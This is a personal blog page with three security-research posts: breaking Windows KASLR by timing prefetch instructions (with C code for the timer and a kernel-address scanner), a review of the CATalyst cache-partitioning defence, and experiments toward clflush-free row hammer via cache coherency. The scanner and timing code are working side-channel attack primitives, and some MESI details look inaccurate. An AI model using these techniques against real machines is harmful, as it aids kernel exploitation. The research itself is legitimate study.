Saturday, February 20, 2016

Breaking KASLR with microarchitecture, Part 1


Hack in the box & stuff

Skip to Introduction if you are here for the tech stuff. I submitted a CFP to "Hack In the Box" in Amsterdam, which takes place at the end of May, and the talk has been accepted. So I'll be spending part of my vacation this year presenting some of my research on cache side channel attacks from the last year or so. I'm really excited, because I think I actually have some really nice stuff to present: not only is it technically interesting, but I think it's far more relevant than the common perception in the infosec community. If you have a chance, I think it'll be worthwhile going. Among those presenting is Jacob Torrey, whose material I have covered twice on my blog and who in my opinion really is one of those pushing the boundaries of infosec. Felix Wilhelm is also going; I currently have his master's thesis on my night table and thus far it is indeed very cool reading.

Preparing a talk obviously takes a lot of time and since I’m an amateur this is going to cut down on the time I can spend on this blog. I have two more posts in the pipeline (including part 2 of this post), but no idea when I can get them done really.

Finally, posting this blog post has been a big dilemma for me. I had the basic idea almost a year ago and I've been putting it off again and again, because it's offensive and posting it is a moral borderline case for me. I decided to go ahead, but with a heavy heart. My heart is also heavy because when I started this blog I wanted to target the ambitious newbie; however, my work has tended to become progressively less accessible, and this particular post is probably the least accessible thus far.

Introduction


KASLR stands for "kernel address space layout randomization". It is a feature of most modern operating systems meant to protect against privilege escalation attacks that rely on code reuse, such as ROP (return oriented programming). The idea is that if an attacker doesn't know where the code is, he cannot set up a ROP chain to reuse it. A modern operating system therefore loads drivers at different addresses on each boot, which leaves an attacker in the dark about where the code is located. Code reuse attacks have grown in importance for privilege escalation because of driver signing requirements and the widespread use of "no-execute" settings on the stack and other data in kernel mode, forcing the attacker to either bypass driver signing to load a driver, attack the page tables, or reuse existing code.

The attacker has typically relied on information leaks in known drivers that give away addresses which can be used to locate code. Last year, however, I had an idea for how we might use the CPU design itself for our information leak, and that is the topic of this blog post. Using the CPU design against KASLR is particularly bad news because CPUs are not subject to updates the way software is, and in the past Intel has not been forthcoming with security fixes in this respect. Relying on the CPU also means the technique generalizes across operating systems, so many of the findings I've made here for Windows 7 will carry over to other platforms. On the other hand, these kinds of attacks may be applicable only to a subset of CPUs. I think that all modern Intel CPUs with a 3rd level cache (i3, i5, i7 and Xeons from Sandy Bridge and up) are likely to be affected, and possibly other CPUs as well.

Finally I’d like to say these kind of attacks has been made before but I’m not aware of any with the same methodology as mine.

Finding drivers

The idea revolves around the "prefetch" instructions. These instructions let software give the prefetcher a hint to load a specific address into a certain cache level because the software will need it shortly. This can significantly improve performance, as the prefetcher runs independently of the CPU and memory is thus fetched before it will be used. There is however an interesting thing about the prefetch instructions that caught my eye: they don't cause exceptions (except when used with a lock prefix) [2]. Yet they take a virtual address as input and need a physical address to load memory and place it in the cache. Thus they may entirely bypass memory protection mechanisms, which seems relatively plausible: since they aren't actually reading data, they should not in any way or fashion allow an attacker to read memory he isn't supposed to. Consequently Intel might have decided that there wasn't a security issue.

My first idea was to use the prefetch instruction in a modified prime+probe or evict+time attack. That is: make a guess about an address in a driver, use the prefetch instruction to load the cache entry, and then use evict+time or prime+probe to tell whether you actually hit the address. This of course is pretty slow, and there is a lot of memory you'd need to run this on before you'd actually find your way around the kernel address space. I'll get back to this in another post.

The second idea was: what if the prefetch instructions leak information through their execution time? I thought of 3 scenarios:

1) Prefetch does not leak information (e.g. the DS descriptor has a limit, the prefetcher doesn't do anything on kernel memory when called from ring 3, it is designed to be constant time, etc.)
2) Prefetch is slower on virtual addresses that actually map to a page, for example because telling the prefetcher to load the cache takes time.
3) Prefetch is slower on addresses that do not map to a page, because searching all the page table entries for an address is slower than stopping as soon as you hit something.

Well. First I dug into the descriptor issue mentioned in 1), because that would be a no-go: I recall that 32-bit XP actually has a limit on its DS descriptor, making it useless for accessing kernel mode memory. It seems though that this is not the case in 64-bit mode, as section 5.3.1 of [1] clearly says that limits are not checked at run time (I think there are some exceptions for FS/GS). So, time to load up a debugger and write some code.

First I loaded LiveKD and dumped a map of the drivers using the "lm n t" command. Then I wrote some user mode code that times the prefetcht2 instruction. I picked prefetcht2 because I assumed that loading into the largest-latency cache was most likely to actually be carried out by the prefetcher and thus most likely to be successful. I then wrote code to time prefetching an address 20 times and pick the lowest timing found. My reasoning here is that there is noise in the memory subsystem (hence the multiple accesses, to try and cancel it out), and I take the lowest value because the lower bound tells me more than an average would.

Then I picked two addresses to time in this way: one a few thousand pages below the first loaded driver, and one inside the first loaded driver. Finally I repeated the experiment 1000 times. And voila: the prefetcht2 instruction is faster on a virtual address that is actually mapped. I speculate that this is because searching through the PTEs is aborted early and thus faster. I think I know how to figure out whether this is true, and I may get back to it in another blog post. So I moved on and wrote a small program that scans a small portion of the kernel address space, tells me whether each page is mapped or not, and compares the result to my module list. It worked beyond any expectation.
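
For the curious, here is a minimal sketch of the timing primitive described above, written with MSVC intrinsics rather than the handwritten asm I actually used. The function names and the serialization choices are mine; timing a prefetch this precisely is fiddly, so treat it as an illustration rather than a drop-in tool.

    #include <intrin.h>
    #include <stdint.h>

    // Time a single prefetcht2 of 'address' in cycles. prefetcht2 never faults,
    // not even on kernel or unmapped addresses, which is the whole point.
    static uint64_t time_prefetch_once(const char *address)
    {
        unsigned int aux;
        _mm_mfence();
        uint64_t start = __rdtsc();
        _mm_prefetch(address, _MM_HINT_T2);
        uint64_t end = __rdtscp(&aux);      // rdtscp orders itself after earlier instructions
        _mm_mfence();
        return end - start;
    }

    // Probe an address 20 times and keep the minimum, to cancel out noise from
    // the memory subsystem as described in the text.
    static uint64_t probe_address(const char *address)
    {
        uint64_t best = (uint64_t)-1;
        for (int i = 0; i < 20; i++) {
            uint64_t t = time_prefetch_once(address);
            if (t < best)
                best = t;
        }
        return best;
    }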

So how fast can I scan? It takes about 112 CLKs for a miss and 85 CLKs for a hit on my wife's Sandy Bridge computer. Including code overhead (and with 20 timings per address), I run around 500k probes per second. With a 64-bit address space it would still be impractical to scan everything. However, modern operating systems use paging, so we only need to probe once per page, and a page is usually 4096 bytes. Also, on Windows 7 it appears that the upper 16 bits are all set for driver addresses, which further reduces the problem. Finally, Windows 7 loads drivers contiguously - on my computer around 100 megabytes of them - so I only have to run through a 48-bit address space in 100 megabyte steps to find where the drivers are hiding. This reduces the problem to a practical 6 second problem. I do get a few false positives on this scan: other things than drivers may be located in this space, and I may have some tuning problems; additional probing could further reduce these. But I consistently find the drivers and only a few false positives.
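
A sketch of the scan itself might look like the following. The start address, the 98 CLK threshold and the two-pass idea are just illustrations built on the numbers above; they are machine- and OS-specific, and probe_address is the min-of-20 timer sketched earlier.

    #include <stdio.h>
    #include <stdint.h>

    #define COARSE_STRIDE (100ULL * 1024 * 1024)   // drivers sit in one ~100 MB cluster
    #define HIT_THRESHOLD 98                       // between the ~85 CLK hit and ~112 CLK miss above

    uint64_t probe_address(const char *address);   // the min-of-20 prefetch timer from before

    static void scan_for_drivers(void)
    {
        const uint64_t start = 0xFFFF000000000000ULL;   // upper 16 bits set, as on my Windows 7
        const uint64_t range = 0x0000FFFFFFFFFFFFULL;   // the remaining 48-bit space
        const uint64_t steps = range / COARSE_STRIDE;

        for (uint64_t i = 0; i < steps; i++) {
            uint64_t addr = start + i * COARSE_STRIDE;
            if (probe_address((const char *)addr) < HIT_THRESHOLD)
                printf("candidate driver region near %p\n", (void *)addr);
            // a second, page-granular (4096 byte) pass around each hit maps out the cluster
        }
    }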

What was a blessing above - that the drivers are clustered into one big chunk of pages - is a curse going forward. The problem is that we do not get the size of the individual drivers and thus are unable to tell which is which for a gadget search. However, I believe we can solve this problem with modified versions of the evict+time and prime+probe attacks. That, however, will have to wait for part 2 of this blog post.

Thanks

I need to express my gratitude to Nishat Herath of Qualys for the discussions I had with him on this topic.

Literature

[1] Intel: "Intel® 64 and IA-32 Architectures Software Developer's Manual, Volume 3A: System Programming Guide, Part 1". http://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3a-part-1-manual.pdf
[2] Intel: "Intel® 64 and IA-32 Architectures Software Developer's Manual, Volume 2 (2A, 2B & 2C): Instruction Set Reference, A-Z".


Sunday, February 7, 2016

Comments on CATalyst: the first use of CAT to mitigate Cache Side Channel Attacks

Recently Liu et al. [1] released a very interesting new paper, which will be the topic of this blog post. In my "Rowbuffer side channel attacks" post I speculated that CAT would be interesting as a mitigation for cache side channel attacks. It turns out that I was right about that. I did however get some of the details of how CAT works wrong; Yuval Yarom of the University of Adelaide was kind enough to correct me, and that became an errata. This new paper, which Yuval co-authored, shows that CAT could indeed play an important role in defending against cache attacks. They call their method "CATalyst". In this blog post I give an ultra short and incomplete summary of how CAT and CATalyst work, for context; if you wish to get into the details you really need to read the paper. Though I will be critical of CATalyst in this blog post, I should make it very clear that I consider CATalyst a big step forward towards defending against cache side channel attacks, and that I'd much prefer to have CATalyst than nothing at all - which, as I understand it, is the current state of cloud computing.

Ultra short summary of how CAT works

Cache Allocation Technology, or CAT, is a feature of some newer Xeons; it is not meant to make it into consumer PCs. "Newer" means that some Haswells have CAT - I'm not sure how common it is in Broadwell or Skylake. CAT was meant as a performance enhancement tool that allows a supervisor or hypervisor to allocate more L3 cache to performance critical operations. Essentially the hypervisor or supervisor assigns a "class of service" (COS for short) to an application through an MSR. There are currently 4 COS's. Each COS is associated with a bitmask that describes which ways of the cache can be evicted under this class of service. Thus any application can still have reads, writes and flushes served from any way just as before, but can only evict ways that are compatible with its COS. The intended effect is to shield high priority applications from competitive eviction by lower priority applications.
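
To make the COS/bitmask relationship concrete, here is a ring-0 sketch of what programming CAT might look like. The MSR numbers (IA32_L3_MASK_0 at 0xC90 and IA32_PQR_ASSOC at 0xC8F, with the COS in the upper 32 bits of the latter) are what I recall from the Intel SDM, and the 20-way L3 is an assumption; check the SDM and CPUID before trusting any of it.

    #include <intrin.h>

    #define IA32_L3_MASK_0  0xC90   // capacity bitmask for COS 0; COS n lives at 0xC90 + n
    #define IA32_PQR_ASSOC  0xC8F   // selects which COS the current logical processor runs under

    static void cat_example(void)
    {
        // Assuming a 20-way L3: let COS 0 evict only into ways 0-15 and COS 1 only into ways 16-19.
        __writemsr(IA32_L3_MASK_0 + 0, 0x0FFFF);
        __writemsr(IA32_L3_MASK_0 + 1, 0xF0000);

        // Put the current logical processor under COS 1 (upper 32 bits of IA32_PQR_ASSOC).
        unsigned __int64 pqr = __readmsr(IA32_PQR_ASSOC);
        __writemsr(IA32_PQR_ASSOC, (pqr & 0xFFFFFFFFULL) | (1ULL << 32));
    }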

Using CAT to defend against CSC

Since a flush can be served from any way in the cache just as always, CAT is incapable of defending against flush+reload and flush+flush. However, those attacks can be thwarted by avoiding shared memory across trust boundaries, which is what Liu et al. [1] do to defend against them.

This makes the most important enemy prime+probe. Recall that prime+probe works by priming a cache set so it consists of attacker-only data, waiting for victim activity, and finally accessing the primed data again: if that access incurs a cache miss, the attacker knows that the victim used the cache set. Since CAT can prohibit evictions in parts of the cache, it can make it impossible to prime those parts and thus make prime+probe impossible there.
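
For readers who haven't seen prime+probe spelled out, a bare-bones sketch is below. Building the eviction set (attacker addresses that map to the same set and slice) is the hard part and is left out; the 16-way associativity and the miss threshold are placeholders.

    #include <intrin.h>
    #include <stdint.h>

    #define WAYS 16   // placeholder associativity; the real number depends on the CPU

    static int prime_and_probe(volatile char *eviction_set[WAYS], uint64_t miss_threshold)
    {
        for (int i = 0; i < WAYS; i++)       // prime: fill every way of the target set with our data
            (void)*eviction_set[i];

        // ... wait for victim activity ...

        int victim_used_set = 0;
        for (int i = 0; i < WAYS; i++) {     // probe: a slow reload means the victim evicted us
            _mm_mfence();
            uint64_t start = __rdtsc();
            (void)*eviction_set[i];
            _mm_mfence();
            if (__rdtsc() - start > miss_threshold)
                victim_used_set = 1;
        }
        return victim_used_set;
    }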

However, it would be bad karma to just deny eviction as a general rule, because that comes at a huge performance cost: deny eviction and the cache cannot adapt to the ongoing work and becomes inefficient. With 4 COS values it is only possible to partition the cache into 4 pieces. That again is a bad idea, because in the cloud you typically have, say, 16 to 64 simultaneous VMs on one computer. It would only make it harder for the attacker to get co-location by a factor of 4, but not thwart anything.

Liu et al. [1] deal with this problem rather elegantly. They divide the cache in two: a secure partition and an insecure partition. Since the secure partition is shared among all VMs, prime+probe would still be possible in it. To deal with this, only so much data can be loaded into the secure partition that absolutely everything in it can be cached, and they then make sure that everything in the secure partition actually is cached. The size of the secure partition is kept small to minimize the performance penalty. Finally, the VMM keeps control of the COS values and bitmasks to prevent any evictions in the secure partition. Thus everything in the secure partition is pinned in the L3 cache, and accesses to memory in the secure region will never miss the L3 cache. The VMM exports an API to the VMs' operating systems to load and unload pages into this secure partition for applications in the VMs to use. To prevent a DoS attack on this, each VM can only load its share of secure memory.

Implementation is made possible by the fact that the VMM gets called when MSRs are written. Thus it can reserve a COS for itself for loading pages into the secure partition, and prevent the VMs from obtaining this COS as well as from setting a bitmask that would give access to it.

The really cool thing about this is that it's the first suggested mitigation so far that both looks ironclad and is feasible on current hardware, without being tied down to other micro-architectural designs such as the complex addressing function for cache allocation, and at a reasonable performance cost as well.

Another feature of CATalyst is that it makes row buffer side channels quite difficult, since reads from the secure partition are served entirely from cache and thus do not activate a row in DRAM. It might not be altogether impossible to use row buffer side channels here, as the secure partition may share rows with insecure memory, and read/write memory can cause row activation when write operations trigger write-back operations for reasons of cache coherency. I don't think this is a real problem though.

Problems with this method


I see three problems with this method, however:
1) Modern hardware is required
2) Changes to VMM, OS and applications are required
3) The secure partition is small

Modern hardware
The requirement for modern hardware is a short term problem. In time modern hardware will be available in the cloud and thus it’s not really a big issue.

Changes to VMM, OS and applications
As for the second problem, the OS and VMM could probably be changed fairly easily given the current focus on the cloud. In fact I think the OS changes needed could be implemented by 3rd party drivers and thus easily made available. Applications pose a much bigger issue though. Typically a cloud customer uses multiple applications, each with their own security requirements, and they all need to be updated to support CATalyst. This problem could be overcome, but it is certainly a bigger issue than the first. To my knowledge, security measures that historically required changes to a whole range of applications have not fared well in the market place.

The small partition size
The real issue for me with CATalyst is that the secure partition is small. The obvious maximum size is the cache size of the system, shared by all VMs (say 20 megabytes). That however would be prohibitively expensive performance-wise, which is why the authors talk about taking only a tenth of that, effectively limiting the secure partition to 4-16 pages per VM (2 MB shared by, say, 32 to 128 VMs). Increasing the size probably carries a (near) exponential performance cost: caching the most used cache line brings more than caching the 20th most used cache line.

The authors argue that this isn't a problem: "A few secure pages are usually sufficient for protecting the security-sensitive code and data since these are usually small". I beg to differ. For a single crypto implementation this is obviously true. The problem is that many VMs will have a number of crypto implementations, and operations are typically threaded. Remote access technologies may very well use a different implementation than the web shop, which again uses a different one than SSH, and so on and so forth - not to mention custom implementations. But security requirements don't limit themselves to crypto. Oren et al. [2] showed us that we can infer mouse movement and implement covert channels with cache side channel attacks. Gruss, Spreitzer & Mangard [3] showed us that we can spy on keyboard input in some circumstances. Why care about crypto if your password leaks? I dare speculate that using machine learning combined with cache side channel attacks on the non-secure partition, a great many secrets could be leaked from a co-located victim. After all, which information we each consider sensitive is subjective, and cache side channel attacks apply to a very wide range of data.

Even if each of these things fits individually in the secure partition, bad programming practices, hangs and crashes are likely, at some point, to let a VM DoS itself by filling the secure partition and not releasing it appropriately - not to mention the overhead that would come from frequently loading pages into secure memory. Further, I wouldn't trust software developers in general to correctly identify the security critical code in the first place.

Literature

[1] Fangfei Liu, Qian Ge, Yuval Yarom, Frank Mckeen, Carlos Rozas, Gernot Heiser, Ruby B. Lee (2016): "CATalyst: Defeating Last-Level Cache Side Channel Attacks in Cloud Computing". https://ssrg.nicta.com.au/publications/nictaabstracts/8984.pdf

[2] Yossef Oren, P. Kemerlis, Simha Sethumadhavan, Angelos D. Keromytis (2015): "The Spy in the Sandbox: Practical Cache Attacks in JavaScript". arXiv:1502.07373v2

[3] Gruss, Spreitzer & Mangard (2015): "Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches"

Monday, February 1, 2016

Row hammer, JavaScript and MESI

Ramblings

There is no tech info here; if you don't care about my ramblings, skip to the intro. It's been a while since my last blog post. With 22 blog posts of varying quality in my first year of blogging, it was time to see to it that I got around to my other hobbies, and the usual social commitments around silly season allowed me to enjoy life in other ways. Also, I finally got myself a computer, and it takes forever to install. Most of this post was written while installing operating systems on my new computer, so this blog post is likely the last one written on my wife's Sandy Bridge. From now on I'm on a cheap Broadwell laptop (which, much to my dismay, doesn't row hammer either). The good thing is that my new laptop can be crashed, and I hope to get back to some of the projects that require kernel mode code real soon.

Introduction

I was reading around for another blog post that I'll get around to soon when I stumbled upon an Intel document that caught my attention. It hinted that a read/write pattern could flush the cache, and probably relatively fast at that. In other words: row hammer. It seemed like I could do this project in just a few hours, and given how long it had been since I'd posted something, I figured I'd do this first and then return to the project I was reading up on. I actually thought this was going to fail, so the working title was "Fail at Row hammer js 2.0". There is a tendency that people never publish their failures, but the reality of this stuff is that you fail quite frequently (I do at least); you always learn something in the process, and I think it's a shame that this knowledge generally isn't shared. I turned out to be wrong about two things. I thought the idea could easily be dismissed, but despite not making the final proof, it looks like the idea has merit. The second thing I was wrong about was how long it would take me to finish. Most of that time was spent fighting Visual Studio: optimize and it'll move your instructions around, e.g. doing the memory access and then the clflush instead of the other way around, which makes a huge difference; don't optimize and you'll have any amount of stack access inside your timing section. With just a few hours to spare here and there, I was trying again and again to get it to work instead of just going to handwritten asm - something I ended up doing anyway. As usual, since the topic is offensive in nature, I'll share source code only on request.

Why do we need RowHammer.js 2.0?

The short answer is that we don't. The current rowhammer.js works by figuring out which addresses correspond to a cache set and using that information to build a set of addresses that, when touched, evict the two addresses required to row hammer. There are currently two ways of doing that: either by assuming large pages, which leak information about addresses and cache sets but is an assumption rarely met in the real world, or by timing memory access with an accurate timer. However, JavaScript is increasingly withdrawing access to a timer accurate enough to tell a single cache hit from a cache miss. It does this to prevent spying using cache side channel attacks, but it has a side effect on row hammer: it makes it difficult to figure out which addresses correspond to a cache set. Not impossible, though, since - unlike for spying - it's possible to repeat the experiment until enough signal is available to pick it up even with a low accuracy timer.

Another reason could be that we might be able to work around the cache-miss performance counter detection of row hammer that has been suggested by myself and Nishat Herath of Qualys. Now, before you attackers out there start to cheer too much: I'm fairly certain that a new detection and mitigation along these lines is feasible.

The rough overview

Take this scenario: Core 1 and Core 2 are both reading the same cache line. Core 1 doesn't read it much and gets it from L3, whereas Core 2 reads it a lot and thus retrieves it from its L2. At some point Core 1 decides to write to the cache line. Since Core 2's L2 is disconnected from Core 1, this becomes a coherency problem. The two most likely solutions are these:

1) When writing to a cache line used across multiple caches: stop all access to this cache line, write the modified cache line back to memory, flush it from the cache hierarchy and "reload" the memory. There is an Intel document that can be read as suggesting that this is what happens: "The frequent coordination required between processors when cache lines are marked 'Invalid' requires cache lines to be written to memory and subsequently loaded."

2) The second solution is a bit simpler. There is no reason to actually flush L3 to memory and reload - coherency is guaranteed if L1 and L2 are flushed on all cores, since L3 is shared. Thus the scheme could just be: stop all access to the cache line, modify L3, and finally invalidate all lower-latency caches (L1 and L2) on all cores.

In scenario 1 the possibility of avoiding clflush exists, and this might give us a way to do row hammer without clflush - potentially even in JavaScript. Because this method only requires reading and writing variables, the only micro-architectural knowledge we'd actually need is to figure out whether two addresses belong to the same bank, plus a thread running on two different cores. Seaborn and Dullien [1] demonstrated that finding two addresses that belong to the same bank can be done by chance alone, and it also seems likely that we could get a thread running on another core. Thus, if it works, we'd eliminate the need for a timer, and no special opcodes would be required. In fact there is a good chance that the method could apply to other devices with similar cache implementations.

The cache coherency protocol

I'll spend a tiny bit of time on the cache coherency protocol of modern Intel CPUs. The protocol ensures that multiple caches contain a coherent representation of memory. It is a slightly modified version of the MESI protocol called MESIF, but the literature is much better on MESI, so if you choose to research this you should start there. The MESIF protocol states that any cache entry is always in one of 5 states: Modified, Exclusive, Shared, Invalid or Forward. The order in MESI(F) is not relevant - it just makes the acronym pronounceable. The states are as follows:

Invalid: The cache entry starts out its life as "Invalid". Meaning no meaningful data is stored here. It is also the state that a cache entry enters when we use clflush.

Exclusive: This state means that only one cache contains this cache line. Thus in this state there are by definition no cache coherency issues.

Shared: This state means that the cache line is loaded in two or more caches.

Modified: This state signifies that the cache line is different in the cache than in main memory - thus a memory store operation is required should this cache entry be flushed.

Forward: This is a special case of "Shared". It essentially means that if multiple caches hold a shared copy of a cache line, any read operation should be served from this one.

The protocol then specifies that, for a given cache line, only the following transitions between states are possible (rows are the current state, columns the state being transitioned to):

           to M    to E    to S    to I    to F
    from M   x       x       x      Ok      x
    from E   x       x       x      Ok      x
    from S   x       x      Ok      Ok      Ok
    from I  Ok      Ok      Ok      Ok      Ok
    from F   x       x      Ok      Ok      x

Of interest here is that if any cache (say L3) holds the line in the S state, the cache line cannot be directly modified, because there is no valid transition from S to M. It is this feature we hope to utilize.

Another feature of the Intel cache manager is snooping: any memory request is sent out on the bus so that every core can report back the state of the cache - that is, whether and in what state the appropriate cache line is present in the processor's caches.

I also need to mention the Request For Ownership (RFO for short) transaction. When you're writing to a cache entry that is either shared or invalid, you use an RFO. The RFO is an exclusive command: no other command executes on the cache hierarchy for this cache line while the RFO is processing. The RFO invalidates all other copies of the cache line in the entire cache hierarchy, thus clearing the way for modifying the entry.

We can now outline the two scenarios again.

Core 1 issues a read. The memory is not in the L3 cache, which means it will be loaded into a way in the appropriate cache set: either there is already an invalid way in the set (one of the ways is marked I), or an eviction takes place and one of the ways is marked I. Then data is loaded from main memory and the way is marked E(xclusive).

Core 2 now reads the same memory. The cache manager decides, for some reason, that core 2 needs this cache line a lot and thus wants to fill L2 with this particular cache line. Consequently it finds an empty way (or makes one through eviction) in the appropriate set in L2 and loads the data from L3. Now both the L3 and the L2 cache hold a copy (Intel's cache is inclusive - what is present in L2 must be in L3 too), and thus both entries get stamped S(hared).

Core 1 now places the write operation on the bus. The L3 cache can immediately tell that the line is present and shared. Consequently the L2 copy must be invalidated, so an RFO is sent out on the bus and the L2 entry is invalidated. The question is what happens now:
Option 1: Modify L3 and set it to Modified.
Option 2: Modify L3, write it back to main memory, then set the appropriate entry to Exclusive.
Option 3: Modify L3, write it back to main memory, invalidate L3, and reload from main memory.

For us to use this method for row hammering, we'd need either option 2 or 3: since both reading from and writing to main memory activate the row, either would do for row hammering.

Empirical data

Unfortunately, grey theory is just that. Intel tweaks its processors, and details may have been changed for better performance. But we do have the option of seeing whether we can verify it empirically.

As always when timing things in the memory subsystem, there is a lot of noise. There are many sources of it, but the bottom line is that we need to deal with it. My rough method has been to sample between 200 and 1000 timings, depending on just how much noise I get in my measurements, and then remove the 10% slowest times on the assumption that they were slow due to noise. This is not something that would make my old statistics professors proud, but it's easy to implement and probably doesn't introduce too much bias anyway. Second, we have a ballpark idea of how long a given memory operation takes - say, an uncached memory operation usually takes more than 100 CLKs on my wife's Sandy Bridge - so if I'm timing uncached operations I assume something went wrong if the time spent was less than 100 CLKs. This approach significantly reduces the noise and actually allows me, by looking at the remaining data, to get an idea of what's happening while I'm writing the code. Once I'm confident in the code I calculate the average and standard deviation and formally test my hypothesis.
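
As a concrete illustration of the noise handling, this is roughly what the filtering amounts to: sample a few hundred times, drop the slowest 10%, then look at the rest. The helper names are mine.

    #include <stdlib.h>
    #include <stdint.h>

    static int cmp_u64(const void *a, const void *b)
    {
        uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
        return (x > y) - (x < y);
    }

    // Average of the fastest 90% of the samples; the slowest 10% are assumed to be noise.
    static double trimmed_mean(uint64_t *samples, size_t n)
    {
        qsort(samples, n, sizeof *samples, cmp_u64);
        size_t keep = n - n / 10;
        double sum = 0.0;
        for (size_t i = 0; i < keep; i++)
            sum += (double)samples[i];
        return sum / (double)keep;
    }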

So my first step was to get some ballpark figures. Because it's difficult to benchmark how long an "uncached" memory write takes - it's somewhat undefined - I use memory reads as a proxy for how long it takes to actually reach memory. A cached memory access takes around 66 CLKs on average, while its uncached counterpart (using clflush+mfence to make sure it's not in the cache) takes around 200 CLKs. A clflush on an address loaded just prior takes some 112 CLKs. Finally I timed a write operation (mov [Pointer],1) both when I had previously loaded the address into L3 and when I hadn't: both take around 90 CLKs.
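
The baseline numbers were collected with a harness along these lines - again a sketch with my own helper names, and the exact CLK values will differ from machine to machine.

    #include <intrin.h>
    #include <stdint.h>
    #include <stdio.h>

    static uint64_t time_read(volatile char *p)
    {
        _mm_mfence();
        uint64_t start = __rdtsc();
        (void)*p;
        _mm_mfence();
        return __rdtsc() - start;
    }

    static void baseline(volatile char *p)
    {
        (void)*p;                              // warm the line so the next read is cached
        uint64_t cached = time_read(p);

        _mm_clflush((const void *)p);          // kick it out of the whole hierarchy
        _mm_mfence();
        uint64_t uncached = time_read(p);      // this read has to go to DRAM

        printf("cached %llu CLKs, uncached %llu CLKs\n",
               (unsigned long long)cached, (unsigned long long)uncached);
    }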

These data make a fair amount of sense. Obviously it's a lot faster to read from L3 than from memory. A clflush operation essentially needs to block the cache line in the hierarchy and then actually invalidate the cache entry, and with my fencing we probably also wait for that process to complete. Consequently we'd expect it to take longer than a cached read, but less than an uncached read that actually has to drop down to memory and fetch stuff.

Now I code up the scenario sketched above (a rough C sketch of the steps follows the list):
1. Main thread: Make sure it's running on core 1. Set affinity and sleep to invoke the scheduler.
2. Main thread: Access the address of interest (AOI) 6 times, which in the past has given me good results for getting it loaded into L3 and only L3.
3. Main thread: Start the second thread and wait for it to finish.
4. Second thread: Make sure it's running on core 2, as above.
5. Second thread: Access the AOI 10000 times to load it into L2.
6. Second thread: Finish.
7. Main thread: Modify the AOI and time it with RDTSC - mov [AOI],1
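
A rough Windows sketch of these steps, with error handling left out and the affinity masks chosen arbitrarily; on a hyper-threaded machine you'd want logical processors on two different physical cores.

    #include <windows.h>
    #include <intrin.h>
    #include <stdint.h>
    #include <stdio.h>

    static volatile char *aoi;    // address of interest, e.g. somewhere in a page-aligned buffer

    static DWORD WINAPI second_thread(LPVOID arg)
    {
        SetThreadAffinityMask(GetCurrentThread(), 1 << 2);   // step 4: pin to "core 2"
        Sleep(0);
        for (int i = 0; i < 10000; i++)                      // step 5: pull the AOI into this core's L2
            (void)*aoi;
        return 0;                                            // step 6
    }

    static void run_experiment(void)
    {
        SetThreadAffinityMask(GetCurrentThread(), 1 << 1);   // step 1: pin main thread to "core 1"
        Sleep(0);

        for (int i = 0; i < 6; i++)                          // step 2: AOI ends up in L3 (and only L3)
            (void)*aoi;

        HANDLE h = CreateThread(NULL, 0, second_thread, NULL, 0, NULL);   // step 3
        WaitForSingleObject(h, INFINITE);
        CloseHandle(h);

        _mm_mfence();                                        // step 7: the timed modify
        uint64_t start = __rdtsc();
        *aoi = 1;
        _mm_mfence();
        printf("modify took %llu CLKs\n", (unsigned long long)(__rdtsc() - start));
    }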

And voila: now the write mostly takes around 170-210 CLKs. This tells me that I'm on to something. It's much slower than a normal write operation, so we can assume that something is going on. It's also far slower than the clflush from my baseline, which should amount to a flush of a cache entry in the E(xclusive) state. In fact the timing suggests that we are hitting main memory. That it isn't always between 170-210 CLKs, and sometimes far below, seems to suggest that from time to time my address of interest gets removed from L2 on core 2 before I actually modify it. Maybe the combination of destroying the second thread and waiting for it to be done is enough for other system activity to evict the AOI from L2.

But we don’t actually have to live with this circumstantial evidence. We might be able measure if we actually hit memory. It goes like this. When writing to physical memory the row you wish to write in is loaded into the row buffer of the ram. Then it’s modified with the data being written – remember the row buffer is 8kb where as a cache line is only 64 bytes. Finally the row buffer is written into the appropriate row. Consequently if we make sure that another row is in the row buffer by reading it from physical memory before modifying the address of interest we can do a row buffer side channel attack to see if the row was now removed.  

Just prior to modifying, I therefore added a function that randomly accesses physical memory in a large buffer 200 times, making it unlikely that the address of interest's row remains in the row buffer. I then modify the address of interest as usual and afterwards access the row of the address of interest. To avoid reusing the AOI's cache line, I make sure to place the AOI on a page boundary and access the memory 2 cache lines further ahead. Thus I have no cache conflicts, but from Seaborn's [5] mapping of physical memory I can be sure I access the same row.
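
In code, the row buffer check looks roughly like this; big_buffer is a multi-megabyte allocation used only to push other rows through the row buffer, and the 2-cache-line offset relies on the AOI being page aligned as described.

    #include <intrin.h>
    #include <stdint.h>
    #include <stdlib.h>
    #include <stdio.h>

    static void row_buffer_check(volatile char *aoi, volatile char *big_buffer, size_t buf_size)
    {
        for (int i = 0; i < 200; i++)                          // touch pages all over the buffer so
            (void)big_buffer[((size_t)rand() * 4096) % buf_size]; // the AOI's row is unlikely to be open

        *aoi = 1;                                              // the modify under test

        volatile char *same_row = aoi + 2 * 64;                // same DRAM row per [5], different cache line
        _mm_mfence();
        uint64_t start = __rdtsc();
        (void)*same_row;
        _mm_mfence();
        printf("same-row read: %llu CLKs\n", (unsigned long long)(__rdtsc() - start));
    }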

When I read an address from a row that is already in the row buffer, as I did for my baseline, I get read times of around 200 CLKs. Interestingly, if I immediately access the same row in the scheme above, it takes around 350 CLKs for the request to finish. This seems to indicate that a required resource is unavailable at that time; I have only unfounded speculation as to what that could be. However, if I execute a loop of a significant number of dummy instructions (mfence) and then access the memory, I get times around 208 CLKs, which is consistent with the row in question being in the row buffer. Thus I think I have a strong case that I actually activate the row in DRAM, which is the ultimate prerequisite for row hammering.

Can we simplify the attack vector?

If you are smarter than I was, you probably already know what I'm hinting at. MESI(F) is a protocol to keep coherency between caches - not cores. The core story might just have been a detour in my thinking. What if we load the address of interest into L2 and then modify it on the same core? We'd have exactly the same effect without the threads. At least with a high number of accesses to make sure the AOI is elevated to L2, this does indeed seem to work, though the latency of the modify drops from around 200 to around 150 CLKs.
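
The single-core variant then shrinks to something like this, with the same assumptions and helper style as before.

    #include <intrin.h>
    #include <stdint.h>

    static uint64_t single_core_variant(volatile char *aoi)
    {
        for (int i = 0; i < 10000; i++)   // hammer reads so the AOI is elevated into L1/L2
            (void)*aoi;

        _mm_mfence();
        uint64_t start = __rdtsc();
        *aoi = 1;                         // timed modify - around 150 CLKs in my tests, per the text
        _mm_mfence();
        return __rdtsc() - start;
    }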

Good enough?

